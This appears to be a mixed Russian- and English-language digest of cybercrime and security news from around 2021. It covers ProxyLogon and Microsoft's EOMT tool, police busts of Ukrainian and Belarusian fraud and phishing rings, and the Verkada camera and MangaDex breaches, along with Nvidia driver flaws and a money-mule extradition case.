По словам человека, называющего себя представителем Blender Wallet, доступ к исходному коду сервиса закрыт, поскольку это «не приложение, а веб-сайт». Мелащенко парирует, что вести подобный бизнес, не раскрывая код, — недобросовестная практика, поскольку речь идет о работе с деньгами.
Собеседник ForkLog, называющий себя представителем Blender Wallet, подтвердил, что созданную при регистрации сид-фразу пользователь может использовать в других кошельках.
От имени команды он обещал позднее предоставить транзакции с похищенными средствами.
Разработчики Microsoft выпустили инструмент под названием EOMT (Exchange On- premises Mitigation Tool), предназначенный для установки обновлений на серверы Microsoft Exchange в один клик и защиты от уязвимостей ProxyLogon. Утилита уже доступна для загрузки на GitHub компании.
В начале марта 2021 года инженеры Microsoft выпустили внеплановые патчи для
четырех уязвимостей в почтовом сервере Exchange, которым исследователи дали
общее название ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и
CVE-2021-27065).
Эти уязвимости можно объединить в цепочку, а их эксплуатация позволит
злоумышленнику пройти аутентификацию на сервере Exchange, получить права
администратора, установить малварь и похитить данные.
По подсчетам экспертов Palo Alto Networks и Microsoft, в сети по-прежнему
доступны около 80 000 уязвимых серверов Exchange, которые можно
скомпрометировать.
В настоящее время атаки на уязвимые серверы совершают около 10 хак-групп,
разворачивая на серверах веб-шеллы, майнеры и шифровальщики.
В первую очередь EOMT предназначен для компаний без собственных ИТ- специалистов, которые могли бы разобраться в проблеме ProxyLogon и корректно установить необходимые обновления. Дело в том, что с установкой патчей тоже могут возникнуть проблемы. К примеру, ранее сообщалось, что обновления для Microsoft Exchange могут устанавливаться без столько необходимых патчей если включен UAC. В итоге нужно устанавливать обновления только от лица администратора.
Теперь в Microsoft надеются, что любой сотрудник компании справится с загрузкой EOMT и выполнит обновление, просто кликнув по EOMT.ps1. Скрипт установит на сервере конфигурацию URL Rewrite, чего будет достаточно для устранения бага CVE-2021-26855, который является отправной точкой для работы цепочки эксплоитов, известных под общим названием ProxyLogon.
Также инструмент включает в себя копию Microsoft Safety Scanner, который будет сканировать серверы Exchange в поисках известных веб-шеллов, которые ранее были замечены в атаках на ProxyLogon. В случае необходимости Microsoft Safety Scanner удалит бэкдор и закроет доступ злоумышленниками.
Источник: xakep.ru/2021/03/16/eomt/
Правонарушители рассылали компаниям и предпринимателям электронные письма с вредоносным программным обеспечением. От их имени-создавали фиктивные платежные поручения, которые в дальнейшем обналичивали.
Противоправную деятельность разоблачили работники Департамента киберполиции совместно со следственным управлением столичной полиции.
Фигуранты рассылали на электронные адреса компаний и предпринимателей письма с вредоносным программным обеспечением. Сообщения маскировали под архивы с документами, в которых были требования оплаты определенных услуг или предоставления информации государственным органам.
Вирусные программы предоставляли удаленный доступ к компьютерам бухгалтеров и директоров. Злоумышленники создавали платежные поручения от имени юридических и физических лиц на подконтрольные счета. В дальнейшем деньги обналичивали. По предварительным подсчетам, потерпевшим нанесено более 5 миллионов гривен убытков.
Правоохранители провели восемь обысков на территории Киева и Киевской области. Изъяли компьютерную технику, мобильные телефоны, банковские карты, флеш- накопители и «черновые» записи.
Открыто уголовное производство по ч. 3 ст. 185 (Кража), ч. 2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Злоумышленникам может грозить до восьми лет лишения свободы. Следственные действия продолжаются.
Процессуальное руководство в уголовном производстве осуществляет Киевская городская прокуратура.
• Source: npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-grupu- zlovmisnikiv-yaki-za-dopomogoyu-virusu-vikrali-ponad-5-miljoniv-griven/
Злоумышленники делали объявления в телеграм-каналах о якобы бирже криптовалют, вложив электронные средства в которую можно получить прибыль. Однако, фактически инвесторы перечисляли свои активы на личные криптокошельки злоумышленников и теряли средства.
Следователи Дарницкого управления полиции совместно с работниками Управления противодействия киберпреступлениям в г. Киеве и процессуального руководства Дарницкой окружной прокуратуры разоблачили сеть call-центров, которая под видом криптовалютной биржи присваивала средства граждан. Всего правоохранители разоблачили девятерых фигурантов в возрасте от 20 до 25 лет и провели 28 обысков по местам их проживания в Киевской, Ровенской и Житомирской областях.
В ходе проведения досудебного расследования установлено, что организовали преступное сообщество двое жителей Киевской области. Они присоединили к сотрудничеству семерых так называемых колл-менеджеров. В дальнейшем, организаторы занимались рекламой своих услуг по заработку в телеграм-каналах. Другие участники схемы выдавали свои собственные криптовалютные кошельки за криптовалютную биржу и обещали инвесторам получение прибылей от вкладывания своих виртуальных активов, однако в дальнейшем присваивали денежные активы граждан и переставали выходить на связь.
Во время обысков правоохранители изъяли у фигурантов десятки телефонов, компьютерную технику, 36 банковских карт, около 54 тысячи долларов США и два автомобиля, рыночная стоимость каждого из которых может составлять 20-25 тысяч долларов. Ходатайство об аресте денежных средств и транспортных средств направлено на рассмотрение в суд.
Все участники преступной организации задержаны в порядке ст. 208 Уголовно- процессуального кодекса Украины. Следователи сообщили задержанным о подозрении по ч. 4 и 5 ст. 190 (мошенничество, совершенное в особо крупных размерах или организованной группой, путем незаконных операций с использованием электронно- вычислительной техники) и ч. 1 и 2 ст. 255 (создание, руководство преступным сообществом или преступной организацией, а также участие в ней) Уголовного кодекса Украины.
Четырем фигурантам избраны меры пресечения в виде содержания под стражей, еще пятерых подозреваемых суд поместил под домашний арест. Максимальное наказание, которое может грозить подозреваемым - до 12-ти лет лишения свободы с конфискацией имущества.
• Source: kyiv.npu.gov.ua/news/pid-vyhliadom-kryptovaliutnoi-birzhi- pryvlasniuvaly-virtualni-aktyvy-u-hromadian-politseiski-stolytsi-prypynyly- diialnist-potuzhnoi-zlochynnoi-orhanizatsii
Norway's parliament, the Storting, has suffered another cyberattack after threat actors stole data using the recently disclosed Microsoft Exchange vulnerabilities.
Last week, Microsoft released emergency security updates for Microsoft Exchange to fix zero-day vulnerabilities, known as ProxyLogon, used in attacks.
These attacks were originally attributed to a China state-sponsored hacking group known as HAFNIUM who used the vulnerabilities to compromise servers, install backdoor web shells, and gain access to internal corporate networks.
Soon after suffering a cyberattack in December, the Storting today announced a new cyberattack linked to the recent Microsoft Exchange vulnerabilities.
"The Storting has again been hit by an IT attack. The attack is linked to vulnerabilities in Microsoft Exchange, which affected several businesses.
"The Storting does not yet know the full extent of the attack. A number of measures have been implemented in our systems, and the analysis work is ongoing. The Storting has received confirmation that data has been extracted," the Storting disclosed in a statement.
At this time, the Storting has confirmed that the threat actors have stolen data as part of the cyberattack but are still investigating.
"We know that data has been extracted, but we do not yet have a full overview of the situation. We have implemented comprehensive measures and cannot rule out that it will be implemented further."
"The work takes place in collaboration with the security authorities. The situation is currently unclear, and we do not know the full potential for damage," says Storting director Marianne Andreassen.
However, they do not believe this attack is related to their cyberattack in December 2020, attributed to the Russian APT 28 state-sponsored hacking group.
While Microsoft initially attributed the recent Microsoft Exchange server
attacks on a Chinese hacking group known as Hafnium, we have later learned
that other hacking groups had been using them as well.
According to a new report by cybersecurity firm ESET, in addition to Hafnium,
other cybercrime groups known as Tick, LuckyMouse, and Calypso had also been
exploiting the zero-day vulnerabilities before the patches were released.
In a new report released today, ESET states that even more hacking groups are jumping into the Microsoft Exchange frenzy as they rush to hack systems before they are patched[.]
Главным управлением цифрового развития предварительного следствия Следственного комитета завершено расследование в отношении одного из руководителей крупнейшего транснационального скам-сообщества, работавшего по Беларуси.
Организованная преступная группа была создана в 2021 году. В ее состав входило более 700 участников из Украины, России, Беларуси и других русскоязычных стран.
Скам-группа специализировалась на совершении хищений денежных средств с карт- счетов пользователей торговых онлайн-площадок с использованием «фишинговых» интернет-ресурсов, имитирующих такие площадки, сервисы служб доставки, платежные сервисы.
С 2021 года по 2023 год участники данной группировки совершили значительное количество хищений путем «фишинга» у белорусских граждан – более 6 000 хищений на сумму более 1,7 млн рублей.
На след скам-сообщества киберследователи вышли в августе 2022 года. Благодаря применению на практике новых разработок и экспериментальных методик следственным путем были установлены личности руководящего звена, зафиксирован используемый группировкой преступный инструментарий и совершенные преступления.
На первоначальном этапе расследование было сконцентрировано на пресечении преступной деятельности организованной группы, продолжающей ежемесячно совершать сотни хищений. Для этого требовалось установить личность и задержать одну из ключевых фигур группировки – разработчика программных продуктов для организации преступной деятельности скам-группы и автоматизации совершения хищений. В среде кибермошенников такого участника группировки называют «Кодером». Последний применял все технические компетенции и навыки для своей конспирации, на личный визуальный контакт с другими участниками группировки никогда не выходил – только онлайн общение с использованием вымышленных данных. В распоряжении следователей имелся только его сетевой псевдоним.
По крупицам информации, оставленной Кодером на просторах Интернета, удалось составить его «цифровой портрет» и установить личность. Ключевой фигурой транснационального скам-сообщества оказался 17-летний минчанин.
Следователями совместно с МВД была спланирована и реализована уникальная операция по задержанию руководителя скаммеров. Выстроенная им многоуровневая система защиты от изобличения правоохранительными органами оказалась бесполезной. Следователям и милиции удалось обезвредить кибермошенника в его квартире и получить доступ ко всем цифровым доказательствам. В ходе обыска были обнаружены и изъяты программные средства совершения преступлений, базы данных с информацией о преступной деятельности группировок.
За свою работу молодой человек получал 5% от суммы всех денег, похищаемых скам-сообществом у белорусских граждан. За 1,5 года участия в преступной деятельности группировки до задержания он заработал более 90 000 рублей.
Подросток признал свою вину в участии в деятельности транснационального скам- сообщества в качестве разработчика и администратора криминальных программных средств и интернет-ресурсов, детально рассказал об участниках группировки и совершенных ими преступлениях.
В дальнейшем в ходе проведения нескольких десятков реализаций на территории различных областей страны, а также на территории Российской Федерации задержаны 34 участника транснационального скам-сообщества, в том числе из числа руководителей. В отношении 19 обвиняемых применена мера пресечения в виде заключения под стражу.
• Video: https://t.me/skgovby/10484
• Source: sk.gov.by/ru/news-ru/view/zaversheno-rassledovanie-v-otnoshenii- rukovoditelja-krupnejshej-skam-gruppy-13329
Group-IB и «Столото» (входит в холдинг S8 Capital), крупнейший оператор всероссийских государственных лотерей, обнаружили и нейтрализовали около 3000 мошеннических ресурсов, замаскированных под популярные лотереи, а также более 5 000 фейковых аккаунтов и групп в соцсетях. «Двойники» незаконно использовали бренд «Столото».
По данным «Столото», в лотереях участвует в среднем каждый третий житель России, а совокупный объем выигрышей к началу 2021 года превысил 130 млрд руб. При этом общее количество победителей-миллионеров приблизилось к 6000 человек. Популярность лотерей с каждым годом увеличивается, что неизменно привлекает внимание мошенников и параллельно требует от операторов повышенного внимания к безопасности розыгрышей.
Среди интернет-мошенников, работающих в сегменте лотерей, наиболее часто используемой схемой является, так называемая, «Кроличья нора» — масштабная многоступенчатая афера, в рамках которой пользователи проходят множество этапов, оказываясь на разных площадках, начиная с мессенджеров и соцсетей и заканчивая скрытыми веб-ресурсами, для доступа на которые под каждую жертву формируется индивидуальная фишинговая ссылка.
Впервые схема была описана в исследовании Group-IB в марте 2020 года. В случае с лотерями через рекламу в соцсетях пользователей привлекают на фейковый лотерейный сайт, чтобы поучаствовать в розыгрыше. Жертве дарят «билет», который в процессе розыгрыша естественно оказывается выигрышным. Забрать крупную сумму можно, заплатив небольшую «комиссию». Победителя отправляют на фишинговый ресурс, где он должен ввести данные банковской карты. В итоге жертва теряет и деньги за «комиссию» и данные карты.
Для борьбы с Интернет-мошенниками «Столото» и Group-IB заключили соглашение о сотрудничестве. В рамках партнерства с помощью высокотехнологичной платформы Group-IB Digital Risk Protection (DRP) блокируются потенциально подозрительные сайты и аккаунты в соцсетях, а также почтовые адреса, замеченные в фишинговых рассылках. Анализируя десятки различных источников, среди которых доменные имена, контекстная реклама, поисковая выдача, магазины мобильных приложений, решение Group-IB полностью автоматизированно блокирует любые нарушения, связанные с незаконным использованием бренда и символики «Столото». К настоящему моменту Group-IB и «Столото» заблокировали 2 741 мошеннических сайтов, 84 почтовых адреса, которые рассылали фишинговые письма, а также 5 597 фейковых аккаунтов, групп, в соцсетях и новостных страниц. Все они незаконно использовали бренд «Столото».
• Source: group-ib.ru/media/gib-stoloto-online-fraud/
A group of hackers say they breached a massive trove of security-camera data collected by Silicon Valley startup Verkada Inc., gaining access to live feeds of 150,000 surveillance cameras inside hospitals, companies, police departments, prisons and schools.
Companies whose footage was exposed include carmaker Tesla Inc. and software provider Cloudflare Inc. In addition, hackers were able to view video from inside women’s health clinics, psychiatric hospitals and the offices of Verkada itself. Some of the cameras, including in hospitals, use facial-recognition technology to identify and categorize people captured on the footage. The hackers say they also have access to the full video archive of all Verkada customers.
In a video seen by Bloomberg, a Verkada camera inside Florida hospital Halifax Health showed what appeared to be eight hospital staffers tackling a man and pinning him to a bed. Halifax Health is featured on Verkada’s public-facing website in a case study entitled: “How a Florida Healthcare Provider Easily Updated and Deployed a Scalable HIPAA Compliant Security System.” A spokesman for Halifax confirmed Wednesday that it uses Verkada cameras but added that “we believe the scope of the situation is limited.”
Another video, shot inside a Tesla warehouse in Shanghai, shows workers on an assembly line. The hackers said they obtained access to 222 cameras in Tesla factories and warehouses.
The data breach was carried out by an international hacker collective and intended to show the pervasiveness of video surveillance and the ease with which systems could be broken into, said Tillie Kottmann, one of the hackers who claimed credit for breaching San Mateo, California-based Verkada. Kottmann, who uses they/them pronouns, previously claimed credit for hacking chipmaker Intel Corp. and carmaker Nissan Motor Co. Kottmann said their reasons for hacking are “lots of curiosity, fighting for freedom of information and against intellectual property, a huge dose of anti-capitalism, a hint of anarchism -- and it’s also just too much fun not to do it.”
A Tesla facility seen through a Verkada camera.
Tillie Kottmann
“We have disabled all internal administrator accounts to prevent any
unauthorized access,” a Verkada spokesperson said in a statement. “Our
internal security team and external security firm are investigating the scale
and scope of this issue, and we have notified law enforcement.”
A person with knowledge of the matter said Verkada’s chief information security officer, an internal team and an external security firm are investigating the incident. The company is working to notify customers and set up a support line to address questions, said the person, who requested anonymity to discuss an ongoing investigation.
“This afternoon we were alerted that the Verkada security camera system that monitors main entry points and main thoroughfares in a handful of Cloudflare offices may have been compromised,” San Francisco-based Cloudflare said in a statement. “The cameras were located in a handful of offices that have been officially closed for several months.” The company said it disabled the cameras and disconnected them from office networks.
Tesla said that, “based on our current understanding, the cameras being hacked are only installed in one of our suppliers, and the product is not being used by our Shanghai factory, or any of our Tesla stores or services centers. Our data collected from Shanghai factories and other places mentioned are stored on local servers.”
Other companies identified in this story didn’t immediately respond to requests for comment. Representatives of the jails, hospitals and schools named in this article either declined to comment or didn’t immediately respond to requests for comment.
A video seen by Bloomberg shows officers in a police station in Stoughton, Wisconsin, questioning a man in handcuffs. Sgt. Andrew Johnson, an official in Stoughton, confirmed to Bloomberg News that the department uses Verkada cameras. The hackers say they also gained access to the security cameras of Sandy Hook Elementary School in Newtown, Connecticut, where a gunman killed more than 20 people in 2012.
Also available to the hackers were 330 security cameras inside the Madison County Jail in Huntsville, Alabama. Verkada offers a feature called “People Analytics,” which lets a customer “search and filter based on many different attributes, including gender traits, clothing color, and even a person’s face,” according to a Verkada blog post. Images seen by Bloomberg show that the cameras inside the jail, some of which are hidden inside vents, thermostats and defibrillators, track inmates and correctional staff using the facial-recognition technology. The hackers say they were able to access live feeds and archived video, in some cases including audio, of interviews between police officers and criminal suspects, all in the high- definition resolution known as 4K.
Madison County Jail seen through a Verkada camera.
Tillie Kottmann
Kottmann said their group was able to obtain “root” access on the cameras,
meaning they could use the cameras to execute their own code. That access
could, in some instances, allow them to pivot and obtain access to the broader
corporate network of Verkada’s customers, or hijack the cameras and use them
as a platform to launch future hacks. Obtaining this degree of access to the
camera didn’t require any additional hacking, as it was a built-in feature,
Kottmann said.
The hackers’ methods were unsophisticated: they gained access to Verkada through a “Super Admin” account, allowing them to peer into the cameras of all of its customers. Kottmann says they found a user name and password for an administrator account publicly exposed on the internet. After Bloomberg contacted Verkada, the hackers lost access to the video feeds and archives, Kottmann said.
The hackers say they were able to peer into multiple locations of the luxury gym chain Equinox. At Wadley Regional Medical Center, a hospital in Texarkana, Texas, hackers say they looked through Verkada cameras pointed at nine ICU beds. Hackers also say they watched cameras at Tempe St. Luke’s Hospital, in Arizona, and were also able to see a detailed record of who used Verkada access control cards to open certain doors, and when they did so. A representative of Wadley declined to comment.
The hack “exposes just how broadly we’re being surveilled, and how little care is put into at least securing the platforms used to do so, pursuing nothing but profit,” Kottmann said. “It’s just wild how I can just see the things we always knew are happening, but we never got to see.” Kottman said they gained access to Verkada’s system on Monday morning.
Verkada, founded in 2016, sells security cameras that customers can access and manage through the web. In January 2020, it [raised](https://www.prnewswire.com/news-releases/verkada- raises-80m-at-1-6b-valuation-enters-7b-access-control-market-300995567.html) $80 million in venture capital funding, valuing the company at $1.6 billion. Among the investors was Sequoia Capital, one of Silicon Valley’s oldest firms.
Kottmann calls the hacking collective “Advanced Persistent Threat 69420,” a light-hearted reference to the designations cybersecurity firms give to state sponsored hacking groups and criminal cybergangs.
In October 2020, Verkada fired three employees after reports surfaced that workers had used its cameras to take pictures of female colleagues inside the Verkada office and make sexually explicit jokes about them. Verkada CEO Filip Kaliszan said in a [statement to Vice](https://www.vice.com/en/article/pkdyqm/surveillance-startup-used-own- cameras-to-harass-coworkers) at the time that the company “terminated the three individuals who instigated this incident, engaged in egregious behavior targeting coworkers, or neglected to report the behavior despite their obligations as managers.”
Kottmann said they were able to download the entire list of thousands of Verkada customers, as well as the company’s balance sheet, which lists assets and liabilities. As a closely held company, Verkada does not publish its financial statements. Kottman said hackers watched through the camera of a Verkada employee who had set one of the cameras up inside his home. One of the saved clips from the camera shows the employee completing a puzzle with his family.
What to know in tech
Get insights from reporters around the world in the Fully Charged newsletter.
Bloomberg may send me offers and promotions.
Sign Up
By submitting my information, I agree to the Privacy
Policy and Terms of
Service.
“If you are a company who has purchased this network of cameras and you are
putting them in sensitive places, you may not have the expectation that in
addition to being watched by your security team that there is some admin at
the camera company who is also watching,” said Eva Galperin, director of
cybersecurity at the Electronic Frontier Foundation, who was briefed on the
breach by Bloomberg.
Inside Arizona’s Graham County detention facility, which has 17 cameras, videos are given titles by the center’s staff and saved to a Verkada account. One video, filmed in the “Commons Area,” is titled “ROUNDHOUSE KICK OOPSIE.” A video filed inside the “Rear Cell Block” is called “SELLERS SNIFFING/KISSING WILLARD???” Another video, filmed inside “Drunk Tank Exterior” is titled “AUTUMN BUMPS HIS OWN HEAD.” Two videos filmed from “Back Cell” are titled “STARE OFF - DONT BLINK!” and “LANCASTER LOSES BLANKET.”
The hackers also obtained access to Verkada cameras in Cloudflare offices in San Francisco, Austin, London and New York. The cameras at Cloudflare’s headquarters rely on facial recognition, according to images seen by Bloomberg. “While facial recognition is a beta feature that Verkada makes available to its customers, we have never actively used it nor do we plan to,” Cloudflare said in its statement.
Security cameras and facial-recognition technology are often used inside corporate offices and factories to protect proprietary information and guard against an insider threat, said the EFF’s Galperin.
“There are many legitimate reasons to have surveillance inside of a company,” Galperin added. “The most important part is to have the informed consent of your employees. Usually this is done inside the employee handbook, which no one reads.”
— With assistance by Allison McCartney
Источник: [https://www.pcworld.com/article/250...-nvidia-geforce-gpus-update- drivers-asap.html](https://www.pcworld.com/article/2504035/security-flaws- found-in-all-nvidia-geforce-gpus-update-drivers-asap.html)
Оригинальный перевод заголовка:
Обнаружены уязвимости безопасности во всех графических картах Nvidia
GeForce.
Обновите драйверы как можно скорее!
Если у вас есть графическая карта Nvidia GeForce, вам необходимо скачать последние обновления драйверов прямо сейчас.
Производитель графических карт Nvidia разослал предупреждение для всех владельцев GeForce GPU. Согласно [Nvidia security bulletin](https://go.skimresources.com/?id=111346X1569483&xs=1&url=https://nvidia.custhelp.com/app/answers/detail/a_id/5586&xcust=2-3-2504035-1-0-0&sref=https://www.pcworld.com/article/2504035/security- flaws-found-in-all-nvidia-geforce-gpus-update-drivers-asap.html), в драйверах и другом программном обеспечении компании были обнаружены несколько уязвимостей, требующих срочного внимания. В общей сложности, перечислено восемь уязвимостей, все из которых имеют рейтинг «Высокая» в градации степени серьезности. Если у вас есть графическая карта Nvidia GeForce GPU, вам нужно действовать сейчас.
Область охвата уязвимостей.
Согласно заявлению Nvidia, злоумышленники могут получить доступ к вашей системе, эксплуатируя одну из уязвимостей. С таким уровнем доступа хакеры могут не только инфильтровать и выполнить вредоносный код на вашем ПК, но также читать и красть личные данные.
Уязвимости затрагивают программное обеспечение GeForce, а также Nvidia RTX, Quadro, NVS и Tesla — Windows, так и Linux Операционными Системами.
Nvidia не уточнила, были ли какие-либо из этих уязвимостей уже использованы в реальных атаках. Однако поскольку все графические карты GeForce подвержены этой проблеме, это, вероятно, имеет широкий масштаб.
Срочные меры для пользователей GeForce
Чтобы устранить эти уязвимости безопасности, вам понадобятся последние драйверы Nvidia GeForce версии 566.03 для Windows и версии 565.57.01, 550.127.05 и 535.216.01 для Linux. Nvidia также отмечает, что некоторые дистрибьюторы предоставляют необходимые обновления безопасности в версиях 565.92, 561.03, 556.35 и 553.05.
Для Nvidia RTX, Quadro и NVS обновления версий 566.03, 553.24 и 538.95 решат проблемы безопасности.
Вы можете найти соответствующие обновления с помощью инструмента ручного поиска драйверов Nvidia и скачать их напрямую. Последние драйверы также доступны в приложении Nvidia и GeForce Experience.
Эта статья изначально появилась в нашем партнерском издании PC- WELT и была переведена и локализована с немецкого языка.
Сообщение об ошибке на сайте NVIDIA
В приложении NVIDIA загрузка не начинается
В федеральной прокуратуре Северного округа Техаса в Далласа сообщили, что 3
марта из Праги в Даллас были экстрадированы арестованные там годом раньше
граждане Украины: 39-летний Виктор Воронцов, он же «Алекс» и «АлексКоин», и
40-летняя Злата Ханска Мужук, она же Юлия Мужук, Злата Ханска, Десислава
Николова, «Зайчи» и «Дезире» в двух написаниях.
В период предполагаемой преступной активности Воронцов жил в столице Чехии
Праге и в Интернете называл себя «Alex» и «AlexCoin». Злата Мужук в тот же
период постоянно жила в украинском городе Черкассы и в Интернете называла себя
приведенными выше именами и прозвищами. Кроме них по делу №3-20CR проходит
сообщником (Co-Conspirator или СС), но не обвиняется, гражданин России,
постоянно проживающий в Венгрии.
4 марта Воронцова и Мужук доставили к федеральному судье-магистрату Рене Толивер, которая ознакомила их с обвинением в отмыванием денег и оставила под стражей в распоряжении маршальской службы, ведавшей их экстрадицией. Прокуратура настаивала на такой мере пресечения, так как арестованные иностранцы а) могут скрыться и б) обязаны являться в суд по требованию. Оба получили назначенных судом адвокатов, и Воронцова представляет Кортни Стампер, а его предполагаемую сообщницу Кевин Рос. Дело слушается при украинской переводчице Наташе Ксендзофф. Обвинение представляет помощник федерального прокурора Северного округа Техаса Роберт Николс.
Где держат подсудимых, не уточняется, но в базе данных федеральных тюрем Воронцова и Мужук пока нет. Как считает обвинение, они были «членами международной организованной группы, которая помогала киберпреступникам обналичивать и отмывать деньги», действуя в течение всего 2017 года. Конкретно в деле идет речь о 7 электронных переводах в октябре и ноябре 2017 года на общую сумму «почти 500 тыс. долларов». В пресс-релизе прокуратуры поясняется, что киберпреступники, которым помогали Воронцов и Мужук, «пользовались украденными данными для проникновения на банковские счета, с которых обманом переводили деньги на счета, открытые и контролируемые другими преступниками». Воронцов и Мужук за плату предоставляли преступной группе такие открытые счета, а также «денежных мулов» для получения, перевода и сокрытия денег, добытых мошенническими компьютерными переводами».
Интересно, что участники этой преступной группы в деле названы «игроками» (actors) различных амплуа – «кибер-игроки» (cyber actors) получали деньги, а «игроки-обнальщики» (cash-out actors) их отмывали. «Денежные мулы» подчинялись «игрокам-обнальщикам», и по их указаниям открывали подставные компании и банковские счета, на которые поступали и с которых уходили деньги, украденные «кибер-игроками». В частности, этим занимался проживающий в Венгрии россиянин СС, который открывал там KFT – венгерская аббревиатура нашей LLC (Limited Liabilitity Corporation). СС и еще один «игрок» открыли в венгерском банке MagNet Magyar Kozossegi корпоративный счет на имя KFT Baltic Cold Lady. В деле также фигурируют Oberbank AG в Австрии, где СС открыл личный счет в марте 2016 года, и BRE Bank в Польше, в котором Злата Мужук открыла два счета на имя Десиславы Николовой.
Пострадавшая от кибермошенников «компания А» находилась в Далласе, а ее счет был открыт в местном отделении банка Chase. Другая жертва – «компания Б», находилась в городе Фуллертон, штат Калифорния, со счетом в местном отделении Commercial Bank. Кроме них жертвами жуликов значатся частные граждане «№1» со счетом в брокерской фирме Charles Schwab and Co., а также «№2», «№3» и «№4» со счетами в Bank of America. В обвинении, которое пока уместилось на 9 страницах, перечислены 6 из 7 эпизодов переводов украденных денег из США в Европу с 11 октября по 13 ноября 2017 года на общую сумму 498 820 долларов. Куда делся упомянутый в пресс-релизе седьмой эпизод, не ясно, да и денег на него из отмеченных в пресс-релизе «почти полумиллиона» не осталось. Судя по масштабам обвинения, Виктор Воронцов и Злата Мужук – мелкая киберпреступная сошка, но, тем не менее, в связи с их экстрадицией «Радио Прага» 6 марта с ссылкой на представителя отдела полиции по борьбе с организованной преступностью назвало их «двумя высокопоставленными членами группы, которая пользовалась изощренными методами кибервремени и открывала в этой стране банковские счета по фальшивым документам».
У страха глаза велики, а у страха бывшей Чехословакии перед бывшим «Большим Братом» СССР тем более. В середине августа прошлого года то же «Радио Праги», но уже с ссылкой на «секретную службу» сообщило об аресте российского дипломата, который «незаконно покупал боеприпасы, включая детали снайперской винтовки», в поселке Рикани в 23 километрах от Праги. Дипломат работал в офисе военного атташе российского посольства, был освобожден в связи с иммунитетом и незамедлительно улетел в Москву. Тогда же сообщалось, что в апреле 2020 года мэра Праги пришлось взять под усиленную охрану. По данным сетевой службы новостей Respekt, которое сослалось на анонимный «источник в разведке», в Прагу прибыл гражданин с российским диппаспортом и заданием отравить градоначальника Зденека Гржиба ядом рицин. Дальнейшего подтверждения это сообщение не получила, и 39-летний мэр остался жив, здоров и невредим.
Не вдаваясь в подробности, федеральная прокуратура Северного округа Техаса сообщила, что расследованием этого дела занималось наше ФБР совместно с Национальным агентством по борьбе с организованной преступностью (NCOZ) Чехии. В конце января 2020 года NCOZ сообщило ФБР, что Мужук гостит у Воронцова в его доме в Праге, и тогда же федеральный судья-магистрат в Далласе выдала ордер на их арест, а агент ФБР вылетел в Прагу. 6 февраля 2020 года Мужук и Воронцов были арестованы, при аресте и обыске у них изъяли ценные вещественные доказательства. В пресс-релизе далласская прокуратура назвала их арест «беспрецедентно быстрой» реакцией властей двух государств. Оба сопротивлялись экстрадиции, но министерство юстиции Чехии вынесло такое решение в отношении Мужук 4 декабря 2020 года, а Воронцова – 21 января 2021 года. 3 марта оба были экстрадированы.
Виктор Воронцов и Злата Мужук пока считаются невиновными, но если суд решит иначе, они станут вторыми украинскими погонщиками «денежных мулов», экстрадированными в Соединенные Штаты за два последних года. Как уже сообщалось, 11 февраля этого года в федеральном суде Западного округа штата Северная Каролина в городе Шарлотт приговорили к 87 месяцам лишения свободы 38-летнего Александра Сергеевича Мусиенко, уроженца Одессы и гражданина Украины. Присяжные большого жюри федерального суда Западного округа Северной Каролины в июне 2016 года заочно предъявили «Александру Мусиенко, он же Олександр Серхиович Мусиенко, он же Роберт Дэвис и он же ‘Пли’ «, обвинения в мошенничестве и отмывании денег.
По выданному судьей в Шарлотт ордеру на арест Мусиенко он был объявлен в международный розыск, и в 2018 году арестован в Южной Корее. В конце марта 2019 г. Мусиенко экстрадировали в США, и 20 ноября того же года он признал себя виновным только в мошенничестве с электронными переводами, а точнее, в том, что был «организатором, лидером, менеджером или руководителем преступной активности». При этом он «сознательно и ложно регистрировал базы данных и сознательно пользовался ими для совершения правонарушений», причем сумма установленного или предполагаемого ущерба от его действий «превышала 3,5 млн долларов и не превышала 9,5 млн», а «пострадавших было больше 10».
Как утверждало обвинение и согласился обвиняемый, с 2009 по 2012 год Александр Мусиенко сотрудничал с «киберпреступниками стран Восточной Европы», которые за это время похитили минимум 2,8 млн долларов с банковских счетов граждан США и отмывали украденные деньги за границей.
В одном из документов дела утверждается, что за это же время «киберпреступники из Восточной Европы похитили в США и отмыли около 5 млн долларов». Роль Мусиенко в этой афере заключалась в том, что он находил и вербовал «мулов», которые за вознаграждение получали украденные деньги на свои банковские личные и корпоративные счета и переводили их по указанным адресам за пределы США, получая за это 5% суммы каждого перевода, а доля Мусиенко при этом составлял 25%.
Комментируя подобные преступления, российский блоггер Тимур Мусин популярно разъяснил, что «в зоологии мул это гибрид осла и лошади, который одинаково схож с обоими своими родителями, но обладает преимуществами в большой силе и выносливости. Идеальное вьючное животное. В свою очередь, в науке о финансах, под денежным мулом (в русскоязычном просторечье – «обнальщик») понимается лицо, которое используется для миграции денежных средств от одних лиц и организаций другим. Стоит отметить, что, как правило, данные деньги носят преступный характер и получены от различных видов преступлений (торговля наркотиками, проституция, торговля людьми, коррупция или уклонение от налогов). Услуги мулов-обнальщиков призваны придать им легальный вид, вывести деньги из страны, избежать налогов, а также скрыть реальный, а точнее, преступный, источник их происхождения».
Manga scanlation giant MangaDex has been temporarily shut down after suffering a cyberattack and having its source code stolen.
MangaDex is one of the largest manga scanlation (scanned translations) sites
where visitors can read manga comics online for free. According to SimilarWeb,
MangaDex is the 179th most frequently visited site on the web, with over 76
million visitors per month.
After suffering a series of outages since March 17th, MangaDex revealed
yesterday that a threat actor had gained access to an admin and developer
account, as well as the source code to the site.
According to an announcement now showing on Mangadex.org, a threat actor gained access to the site after stealing an admin user's session token through a website vulnerability.
"Three days ago (2021-03-17), we correctly identified and reported that a malicious actor had managed to gain access to an admin account through the reuse of a session token found in an old database leak through faulty configuration of session management."
"Following that event, we moved to identify the vulnerable section of code and worked to patch it up, also clearing session data globally to thwart further attempts at exploitation through the same method," MangaDex disclosed on their website.
Using this token, the hacker was able to gain full access to the website and download the site's source code. The attacker then published the site's source code on GitHub using the alias 'holo-gfx.'
While the site audited their code and fixed vulnerabilities, the attacker would taunt the site's developers with comments when a vulnerability was fixed.
Threat actor taunting the
MangaDex devs
When asked what type of vulnerabilities were fixed, the threat actor stated
the first was a "File type confusion" bug, and the second they were keeping
secret.
After MangaDex learned that the threat actor still had access to their environment, they announced that they were temporarily shutting down the site while they worked on and launched a more secure 'v5' version of the site.
"Due to a recent hacking incident, MangaDex will be down until further notice.
